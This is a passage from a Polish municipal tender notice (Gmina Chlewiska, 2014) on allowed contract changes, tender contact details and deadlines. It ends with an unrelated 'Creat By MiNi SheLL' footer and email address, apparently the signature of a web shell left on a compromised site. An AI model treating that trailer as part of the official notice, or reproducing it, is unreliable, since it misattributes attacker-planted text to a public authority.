	3. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń 	przedstawionych w ofercie 	przetargowej pod warunkiem, że zmiany te będą 	korzystne dla Zamawiającego.
      	Będą to, przykładowo, okoliczności:
	a)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego na 	eksploatację i konserwację 	wykonanego przedmiotu umowy;
	b)	powodujące poprawienie parametrów technicznych;
	c)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub 	zmiany obowiązujących przepisów.
	Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń 	przedstawionych w    ofercie 	przetargowej pod warunkiem, że zmiana 	ta nie 	spowoduje obniżenia parametrów tych materiałów lub urządzeń.
	4.	Zmiany, o których mowa w pkt. 1, 2 i 3 muszą być każdorazowo zatwierdzone 	przez Zamawiającego w porozumieniu z projektantem.
	5.	Zamiany, o których mowa w pkt. 1 i 3 nie spowodują 	zmiany ceny 	wykonania 	przedmiotu 	umowy. 
	6. W przypadku zmiany urzędowej stawki podatku VAT strony umowy zobowiązują 	się do podpisania 	aneksu do umowy regulującego wysokość podatku VAT i ceny 	brutto umowy.
	III. Zmiany dotyczące kierownika budowy (robót)
	Zamawiający dopuszcza zmianę kierownika budowy(robót)  na pisemny uzasadniony 	wniosek Wykonawcy. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty 	otrzymania wniosku pod warunkiem, że wskazana osoba spełniać będzie wymagania 	określone w specyfikacji istotnych warunków zamówienia.
	Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku kierownika 	budowy (robót) będzie traktowana jako przerwa wynikła z przyczyn zależnych od 	Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót.
	IV. Zmiany w zakresie podwykonawstwa
	W przypadku nie wskazania w ofercie części zamówienia przewidzianej do 	powierzenia podwykonawcy, 	lub zmiany 	wskazanej w ofercie części 	przewidzianej do powierzenia podwykonawcy  Zamawiający 	dopuszcza zmianę w 	tym zakresie pod warunkiem pisemnego poinformowania Zamawiającego przez 	Wykonawcę o zamiarze wprowadzenia	zmian i po uzyskaniu zgody 	Zamawiającego na 	wprowadzenie tych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chlewiska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINA  CHLEWISKA
26-510   Chlewiska, ul. Czachowskiego 49
tel.:  48 6287053
fax:  48 6287271
e-mail: chlewiska@chlewiska.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2014 godzina 11:00, miejsce: Urząd Gminy w Chlewiskach, ul. Czachowskiego 49, pok. 7 - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com